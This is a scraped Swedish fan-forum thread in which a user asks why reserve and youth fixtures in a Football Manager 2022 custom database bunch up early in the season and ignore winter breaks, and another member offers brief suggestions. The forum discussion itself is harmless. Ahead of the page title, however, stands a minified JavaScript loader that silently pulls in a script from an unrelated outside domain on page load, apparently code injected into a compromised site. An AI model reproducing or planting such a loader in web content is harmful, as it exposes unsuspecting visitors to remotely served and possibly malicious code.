;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Editor-problem – Football Manager 2022 – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

Editor-problem

4 Inlägg
2 Users
0 Reactions
758 Visningar
(@sweldish)
New Member
Topic starter  

Jag har ändrat ligastrukturen så att Sverige kör höst/vår, gör en likadan DB varje år och har aldrig haft problem.
Men på denna upplagan så blir reservlagens spelschema helt hopplöst.

Om jag lägger slutdatum på Reserv/ungdoms serierna till 31 Maj så spelar vissa lag 12 matcher i Augusti, och sen 1-2 matcher mer månad september-januari. Inga matcher i februari-april sen en avslutningsmatch i Maj.
Har även lagt in uppehåll i december och Januari men de ignoreras helt.

Väljer jag att inte ha slutdatum för reserv/ungdom så blir schemat mer normalt, men uppehållet i december och januari ignoreras ändå plus att de känns konstigt att reservserierna ska sluta en månad efter allsvenskan.

Även försökt ändra antal lag i reservserierna men då ballar de ur helt, då hade vissa lag match varannan dag hela augusti-september sen va dom istort sätt helt färdigspelade.

Kan tillägga att Allsvenskan är en delad liga som bryter sista februari om detta har något med de att göra?

Någon som har tips på vad de är jag gör fel?

Citera
raca14
(@raca14)
Reputable Member

Har du kört med att verifiera?

Verkar vara nytt att man måste göra det innan något kan tas i bruk...

Annars så har jag väldigt svårt att tänka mig att det borde vara några större problem.

Man sätter ju datumen för varje division när de ska spelas plus när säsongen i Sverige ska sättas igång. Sedan har du väl även datum för att göra en avrundning för att avsluta säsongen?

Kan inte se att brytet i Allsvenskan ska påverka reservlagsserierna... Då borde ju även andra ligor (länder) ha samma problem...

SvaraCitera
(@sweldish)
New Member
Topic starter  

Ja jag har verifierat, annars gick de inte ens ladda databasen.

Nu har jag fått de att bli spelbart iaf. Men alla reserv och juniorlag spelar extremt mycket matcher tidigt och sen bara lite strömatcher resten av säsongen. Vill att schemat blir jämnare fördelat, de fungerar ju bra med A-lag så vad ställer till det för restv/junior?

AIKs juniorlag har match dessa datum
Juli: 25, 27, 29 (trots att ligan startar 1 augusti)
Augusti: 1, 3 , 5, 7, 11, 14, 17, 21, 28
September: 18, 25
Oktober: 2, 8, 16, 23, 30
November: 6, 14, 21, 27
December: 4, 11, 19 (trots att ligan har uppehåll)
Januari: 2, 9, 16, 23, 30 (trots att ligan har uppehåll)
Februari: 5, 12, 19, 26
Mars: 20
April: 17
Maj: 29

SvaraCitera
raca14
(@raca14)
Reputable Member

@sweldish Ja, då har jag tyvärr inget vettigt svar till dig mer än att göra om det igen. Men förstår om du inte orkar börja om på nytt.

SvaraCitera
Share: